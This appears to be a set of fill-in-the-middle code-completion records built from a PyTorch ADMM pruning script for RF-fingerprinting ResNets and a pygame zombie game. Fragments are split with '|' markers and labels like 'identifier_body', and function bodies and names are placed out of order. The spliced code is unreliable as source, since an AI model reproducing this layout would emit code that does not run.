parser.add_argument('--combine-progressive', default=False, type=str2bool,
help="for filter pruning after column pruning")
parser.add_argument('--purification', default=False, type=str2bool,
help="purification after pruning")
parser.add_argument('--lr-scheduler', type=str, default='default',
help='define lr scheduler')
parser.add_argument('--warmup', action='store_true', default=False,
help='warm-up scheduler')
parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='M',
help='warmup-lr, smaller than original lr')
parser.add_argument('--warmup-epochs', type=int, default=0, metavar='M',
help='number of epochs for lr warmup')
parser.add_argument('--mixup', action='store_true', default=False,
help='ce mixup')
parser.add_argument('--alpha', type=float, default=0.0, metavar='M',
help='for mixup training, lambda = Beta(alpha, alpha) distribution. Set to 0.0 to disable')
parser.add_argument('--smooth', action='store_true', default=False,
help='lable smooth')
parser.add_argument('--smooth-eps', type=float, default=0.0, metavar='M',
help='smoothing rate [0.0, 1.0], set to 0.0 to disable')
parser.add_argument('--no-tricks', action='store_true', default=False,
help='disable all training tricks and restore original classic training process')
########### From RFMLS: multi-gpu; batch-size
parser.add_argument('--exp_name', default='exp1', type=str, help='Specify the experiment name')
parser.add_argument('--base_path', default='/scratch/RFMLS/dataset100/dataset_with_val_9000train/', type=str, help='Specify the base path')
parser.add_argument('--save_path', default='/scratch/zhou.fan1/filtered/', type=str, help='Specify the save path')
parser.add_argument('--file_type', default='mat', type=str, help='Specify type of file you want to read')
parser.add_argument('--decimated', default=False, type=str2bool, help='Specify if the data in the files is decimated, if so and you are using the same stats file as the undecimated then the generator will take this into account')
parser.add_argument('--val_from_train', default=False, type=str2bool, help='If validation not present in partition file, generate one from the training set. (If false, use test set as validation)')
parser.add_argument('--test_on_val_set',default=False, type=str2bool, help='If true it will test the trained model on validation data, for tuning hyperparameters')
parser.add_argument('--train', default=False, type=str2bool, help='Specify doing training or not')
parser.add_argument('-ss', '--slice_size', default=1024, type=int, help='Specify the slice size')
parser.add_argument('-d', '--devices', default=100, type=int, help='Specify the number of total devices')
parser.add_argument('--cnn_stack', default=3, type=int, help='[Baseline Model] Specify the number of cnn layers')
parser.add_argument('--fc_stack', default=2, type=int, help='[Baseline Model] Specify the number of fc layers')
parser.add_argument('--channels', default=128, type=int, help='[Baseline Model] Specify the number of channels of cnn')
parser.add_argument('--fc1', default=256, type=int, help='[Baseline Model] Specify the number of neurons in the first fc layer')
parser.add_argument('--fc2', default=128, type=int, help='[Baseline Model] Specify the number of neurons in the penultimate fc layer')
# Data Generator
parser.add_argument('--generator', default='new', type=str, help='Specify which generator to use')
parser.add_argument('--add_padding', default=False, type=str2bool, help='If examples are smaller than slice size addpadding')
parser.add_argument('--padding_type', default='zero', type=str, help='"zero"-padding and "stride"-padding')
parser.add_argument('--try_concat', default=False, type=str2bool, help='If examples are smaller than slice size and using demodulated data, try and concat them')
parser.add_argument('--preprocessor', default='no', type=str, help='Specify which preprocessor to use')
parser.add_argument('--K', default=1, type=int, help='Specify the batch down sampling factor K')
parser.add_argument('-fpio', '--files_per_IO', default=500000, type = int, help='Specify the files loaded to memory per IO')
parser.add_argument('--shrink', default=1, type=float, help='Dataset down sampling factor')
parser.add_argument('--normalize', default='True', type=str2bool, help='Specify if you want to normalize the data using mean and std in stats files (if stats does not have this info, it is ignored)')
parser.add_argument('--crop', default=0, type=int, help='if crop > 0 the generator crops the examples to a maximum length of crop')
parser.add_argument('--training_strategy', default='big', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--sampling', default='model', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--fir_size', default=11, type=int, help='FIR filter size.')
parser.add_argument('--use_preamble', default=False, type=str2bool, help='Using preamble to train channel-removing filter')
parser.add_argument('--merge_preamble', default=False, type=str2bool, help='Merge preamble with slice to train channel-removing filter')
parser.add_argument('--id_gpu', default=0, type=int, help='If --multigpu=False, this arguments specify which gpu to use.')
parser.add_argument('--test_stride', default=16, type=int, help='Specify the stride to use for testing')
parser.add_argument('--per_example_strategy', default='prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def masked_retrain(initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
|
def test(model, criterion, test_loader):
model.eval()
losses = AverageMeter()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
output = model(data)
loss = criterion(output, target)
losses.update(loss.item(), data.size(0))
# test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
print('\nTest set loss: {:.4f}, * Acc@1: {}/{} ({:.2f}%)\n'.format(
losses.avg, correct, len(test_loader.dataset),
100. * float(correct) / float(len(test_loader.dataset))))
return losses.avg, (100. * float(correct) / float(len(test_loader.dataset)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def convert_secs2time(epoch_time):
need_hour = int(epoch_time / 3600)
need_mins = int((epoch_time - 3600*need_hour) / 60)
need_secs = int(epoch_time - 3600*need_hour - 60*need_mins)
return need_hour, need_mins, need_secs
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.3 ** (epoch // args.lr_decay))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
start_time = time.time()
main()
duration = time.time() - start_time
need_hour, need_mins, need_secs = convert_secs2time(duration)
print('total runtime: {:02d}:{:02d}:{:02d}'.format(need_hour, need_mins, need_secs))
| batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print(i)
if i % args.log_interval == 0:
for param_group in optimizer.param_groups:
current_lr = param_group['lr']
print('({0}) lr:[{1:.5f}] '
'Epoch: [{2}][{3}/{4}]\t'
'Status: admm-[{5}] retrain-[{6}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f}% ({top1.avg:.3f}%)\t'
.format(args.optmzr, current_lr,
epoch, i, len(train_loader), args.admm, args.masked_retrain, batch_time=data_time, loss=losses, top1=top1))
if i % 100 == 0:
idx_loss_dict[i] = losses.avg
return idx_loss_dict | identifier_body |
game.py | ###################################################################################
###################################################################################
# efhagame - by Bartholomaeus Dedersen
# based on:
# Sprite Movement Towards Target Example + Physics
# programed/documented by Mad Cloud Games
# contact Mad Cloud Games @ madcloudgames@gmail.com with any comments, questions, or changes
#
# This project is released under the GNU General Public License V3
# This code is open source
# We would love to know what it gets used for
###################################################################################
###################################################################################
import pygame, math, random, thread
from pygame.locals import *
pygame.init()
screenwidth = 800
screenheight = 600
class Vector():
'''
Class:
creates operations to handle vectors such
as direction, position, and speed
'''
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self): # used for printing vectors
return "(%s, %s)"%(self.x, self.y)
def __getitem__(self, key):
if key == 0:
return self.x
elif key == 1:
return self.y
else:
raise IndexError("This "+str(key)+" key is not a vector key!")
def __sub__(self, o): # subtraction
return Vector(self.x - o.x, self.y - o.y)
def length(self): # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center
()
Parameters:
- self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
if self.distance_check(self.dist): # if we need to slow down
self.speedX += (self.dir[0] * (self.speed / 2)) # reduced speed
self.speedY += (self.dir[1] * (self.speed / 2))
self.speedX *= self.slowing_friction # increased friction
self.speedY *= self.slowing_friction
else: # if we need to go normal speed
self.speedX += (self.dir[0] * self.speed) # calculate speed from direction to move and speed constant
self.speedY += (self.dir[1] * self.speed)
self.speedX *= self.normal_friction # apply friction
self.speedY *= self.normal_friction
self.trueX += self.speedX # store true x decimal values
self.trueY += self.speedY
self.rect.center = (round(self.trueX),round(self.trueY)) # apply values to sprite.center
class BrainSprite(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load("brain.png").convert_alpha()
self.rect = self.image.get_rect()
class BrainSpriteCollection():
def __init__(self):
self.brainSpriteList = pygame.sprite.RenderPlain()
def reset(self):
self.brainSpriteList.empty()
for i in range(7):
brainSprite = BrainSprite()
brainSprite.rect.x = random.randrange(screenwidth)
brainSprite.rect.y = random.randrange(screenheight - 200)
#our brain interface is an enchanced random number generator with a seed defined by the user's mental state
self.brainSpriteList.add(brainSprite)
def returnList(self):
return self.brainSpriteList
'''This class is the functional and visual representation of the
expected user defined movement. The two axles are representative for
X and Y movement.
Finally, a movement vector will be created.'''
class MovementDesignator():
def __init__(self,screen):
self.screen = screen # get the screen as main surface
self.percentX = 100 # scaled from 1-100
self.percentY = 100 # scaled from 1-100: max value is real 246 pixel
def update(self):
pygame.draw.rect(self.screen,[50,50,50],[20,screenheight - 100,204,30],2) # graph for X coordination
pygame.draw.rect(self.screen,[50,50,50],[screenwidth - 100 , screenheight - 250 , 31, 200],2) # graph for Y coordination
if self.percentX:
self.realValueX = 2 * self.percentX
pygame.draw.line(self.screen, (255,0,0),(22,screenheight - 85),(self.realValueX + 22,screenheight - 85), 27)
if self.percentY:
self.realValueY = 2 * self.percentY
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, (100 - self.realValueY) + screenheight - 148), 28)
else:
pygame.draw.line(self.screen, (255,0,0),(screenwidth - 85 ,screenheight - 52),(screenwidth - 85, screenheight - 52 ), 28)
def increase_graphX(self):
if self.percentX < 100:
self.percentX += 10
def | (self):
if self.percentX > 0:
self.percentX -= 10
def increase_graphY(self):
if self.percentY < 100:
self.percentY += 10
def decrease_graphY(self):
if self.percentY > 0:
self.percentY -= 10
def setX(self,x):
self.percentX = x
def setY(self,y):
self.percentY = y
def get_absolute_position(self):
screenX = screenwidth * self.percentX / 100
screenY = screenheight - (screenheight * self.percentY / 100)
#screenY = screenheight * self.percentY / 100
return (screenX,screenY)
def main():
screen = pygame.display.set_mode((screenwidth,screenheight))
pygame.display.set_caption("efhagame - Eat all Brains")
background_color = pygame.Surface(screen.get_size()).convert()
background_color.fill((0,0,0))
line_points = [] # make a list for points
line_color = (0, 255, 255) # color of the lines
line_points.append([screenwidth/2,screenheight-50])
sprite = Sprite() # create the sprite for the player
designator = MovementDesignator(screen) # show the movement vector as a compass like thing
designatorSelector = 0
brainSpriteCollection = BrainSpriteCollection()
brainSpriteCollection.reset()
#write the points
fontObj = pygame.font.Font('ts.ttf', 26)
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
scoreTextRectObj = scoreTextSurfaceObj.get_rect()
scoreTextRectObj.center = (screenwidth - 90, screenheight - 20)
#connection status
statusTextSurfaceObj = fontObj.render('Status: Red', True, (0,0,0), (155,0,0))
statusTextRectObj = statusTextSurfaceObj.get_rect()
statusTextRectObj.center = (120, screenheight - 20)
#sound init
plopSound = pygame.mixer.Sound('plop.ogg')
#background image
backgroundImage = pygame.image.load('background.png')
score = 0
clock = pygame.time.Clock()
running = True
while running:
clock.tick(30) #30 fps
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == MOUSEBUTTONDOWN:
sprite.target = event.pos # set the sprite.target to the mouse click position
line_points.append(event.pos) # add that point to the line list
if event.type == KEYDOWN:
if event.key == K_SPACE:
sprite.reset_position()
line_points.append([screenwidth / 2, screenheight - 50])
scoreTextSurfaceObj = fontObj.render('Eat the Brains!', True, (0,0,0), (155,0,0))
hitlist = None
score = 0
if event.key == K_UP:
designator.increase_graphX()
if event.key == K_DOWN:
designator.decrease_graphX()
if event.key == K_RIGHT:
designator.increase_graphY()
if event.key == K_LEFT:
designator.decrease_graphY()
if event.key == K_RETURN:
pos = designator.get_absolute_position()
sprite.target = pos
line_points.append(pos)
if event.key == K_r:
brainSpriteCollection.reset()
if event.key == K_c:
if designatorSelector == 0:
designatorSelector = 1
else:
designatorSelector = 0
#the stuff from the brain connector
screen.blit(background_color, (0,0)) #fill the screen with black colour
screen.blit(backgroundImage, (0,0))
designator.update() # for movement options
brainSpriteCollection.returnList().draw(screen) # the targets to hit
sprite.update() # update the sprite
screen.blit(sprite.image, sprite.rect.topleft) # blit the sprite to the screen
if len(line_points) > 1: # if there are enough points to draw a line
pygame.draw.lines(screen, line_color, False, line_points, 2) # surface, color of lines, uhh, points of lines, width of lines)
#collision detection and high score
hitlist = pygame.sprite.spritecollide(sprite, brainSpriteCollection.returnList(), True)
if len(hitlist) > 0:
score +=len(hitlist)
scoreTextSurfaceObj = fontObj.render('Total Score: ' + str(score), True, (0,0,0), (155,0,0))
print "hit"
thread.start_new_thread(plopSound.play,())
screen.blit(scoreTextSurfaceObj, scoreTextRectObj) # show the score
screen.blit(statusTextSurfaceObj, statusTextRectObj) # show the status
pygame.display.flip()
pygame.quit() # for a smooth quit
if __name__ == "__main__":
main()
| decrease_graphX | identifier_name |
game.py | ###################################################################################
###################################################################################
# efhagame - by Bartholomaeus Dedersen
# based on:
# Sprite Movement Towards Target Example + Physics
# programed/documented by Mad Cloud Games
# contact Mad Cloud Games @ madcloudgames@gmail.com with any comments, questions, or changes
#
# This project is released under the GNU General Public License V3
# This code is open source
# We would love to know what it gets used for
###################################################################################
###################################################################################
import pygame, math, random, thread
from pygame.locals import *
pygame.init()
screenwidth = 800
screenheight = 600
class Vector():
'''
Class:
creates operations to handle vectors such
as direction, position, and speed
'''
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self): # used for printing vectors
return "(%s, %s)"%(self.x, self.y)
def __getitem__(self, key):
if key == 0:
return self.x
elif key == 1:
return self.y
else:
raise IndexError("This "+str(key)+" key is not a vector key!")
def __sub__(self, o): # subtraction
return Vector(self.x - o.x, self.y - o.y)
def length(self): # get length (used for normalize)
return math.sqrt((self.x**2 + self.y**2))
def normalize(self): # divides a vector by its length
l = self.length()
if l != 0:
return (self.x / l, self.y / l)
return None
class Sprite(pygame.sprite.Sprite):
def __init__(self):
'''
Class:
creates a sprite
Parameters:
- self
'''
self.image = pygame.image.load("zombie.png").convert_alpha() # load image
self.rect = self.image.get_rect()
self.reset_position()
self.speed = 3 # movement speed of the sprite
self.normal_friction = .95 # friction while accelerating
self.slowing_friction = .8 # friction while slowing down
self.target = None # starts off with no target
def reset_position(self):
self.trueX = screenwidth / 2 # created because self.rect.center does not hold
self.trueY = screenheight - 50# decimal values but these do
self.rect.center = (self.trueX, self.trueY) # set starting position
self.speedX = 0 # speed in x direction
self.speedY = 0 # speed in y direction
self.target = None
def get_direction(self, target):
'''
Function:
takes total distance from sprite.center
to the sprites target
(gets direction to move)
Returns:
a normalized vector
Parameters:
- self
- target
x,y coordinates of the sprites target
can be any x,y coorinate pair in
brackets [x,y]
or parentheses (x,y)
'''
if self.target: # if the square has a target
position = Vector(self.rect.centerx, self.rect.centery) # create a vector from center x,y value
target = Vector(target[0], target[1]) # and one from the target x,y
self.dist = target - position # get total distance between target and position
direction = self.dist.normalize() # normalize so its constant in all directions
return direction
def distance_check(self, dist):
'''
Function:
tests if the total distance from the
sprite to the target is smaller than the
ammount of distance that would be normal
for the sprite to travel
(this lets the sprite know if it needs
to slow down. we want it to slow
down before it gets to it's target)
Returns:
bool
Parameters:
- self
- dist
this is the total distance from the
sprite to the target
can be any x,y value pair in
brackets [x,y]
or parentheses (x,y)
'''
dist_x = dist[0] ** 2 # gets absolute value of the x distance
dist_y = dist[1] ** 2 # gets absolute value of the y distance
t_dist = dist_x + dist_y # gets total absolute value distance
speed = self.speed ** 2 # gets aboslute value of the speed
if t_dist < (speed): # read function description above
return True
def update(self):
'''
Function:
gets direction to move then applies
the distance to the sprite.center | - self
'''
self.dir = self.get_direction(self.target) # get direction
if self.dir: # if there is a direction to move
